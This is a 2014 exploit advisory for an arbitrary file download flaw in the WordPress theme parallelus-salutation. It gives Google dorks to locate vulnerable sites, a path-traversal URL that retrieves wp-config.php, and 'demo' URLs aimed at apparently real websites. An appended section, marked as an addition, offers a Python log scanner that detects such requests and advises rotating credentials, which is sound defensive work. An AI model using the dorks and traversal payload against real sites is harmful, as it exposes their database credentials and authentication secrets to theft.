
WordPress theme parallelus-salutation Arbitrary File Download Vulnerability

Author: Iran Cyber Security Group, Published: 24-12-2014
##############################################################
# Exploit Title: WordPress theme parallelus-salutation Arbitrary File Download Vulnerability
#
# Exploit Author: Iran Cyber Security Group
#
# Discovered By: injector
#
# Dork 1: inurl:themes/parallelus-salutation/
#
# Dork 2: inurl:themes/parallelus-salutation/framework/
#
# Date: 18-12-2014
#
# Tested on: Kali, Win7
#
# Category: webapps
#
# platform: php
##############################################################
VULNERABILITY
##############
[~] VULNERABILITY

[~] http://www.Site.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php


##############

demo 1: www.scarabresearch.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php

demo 2: http://www.patchingprotocol.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php

##############################################################
Contact number: +1 647 69 64 247
Contact mail: injector@rogers.com
-------------------Special thanks to: all Persian guys-------------------
##############################################################
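
For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests to the theme's getfile.php whose file parameter climbs out of its base directory, including double-encoded variants. The combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter as they appear in the advisory's URL.
ENDPOINT = "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"
PARAM = "file"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # combined-format request line

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252F) is normalised."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value


def escapes_base(file_value):
    """True if the value is absolute, holds a NUL byte, or resolves above its base directory."""
    path = fully_decode(file_value).replace("\\", "/")
    if "\x00" in path or path.startswith("/") or re.match(r"[A-Za-z]:", path):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def suspicious_requests(log_lines):
    """Return (line number, decoded file value) for traversal requests to the endpoint."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not fully_decode(url.path).lower().endswith(ENDPOINT):
            continue
        values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
        hits += [(number, fully_decode(v)) for v in values if escapes_base(v)]
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    f'203.0.113.7 - - [24/Dec/2014:10:00:01 +0000] "GET {ENDPOINT}?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3120',
    f'198.51.100.4 - - [24/Dec/2014:10:00:09 +0000] "GET {ENDPOINT}?file=docs%2Fbrochure.pdf HTTP/1.1" 200 48211',
    f'203.0.113.7 - - [24/Dec/2014:10:00:15 +0000] "GET {ENDPOINT}?file=..%252F..%252Fwp-config.php HTTP/1.1" 200 3120',
    '198.51.100.9 - - [24/Dec/2014:10:00:20 +0000] "GET /index.php?file=..%2Fabout HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG))
```

A hit with a 200 response for wp-config.php means the database credentials and the authentication keys and salts in that file should be treated as exposed and rotated.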
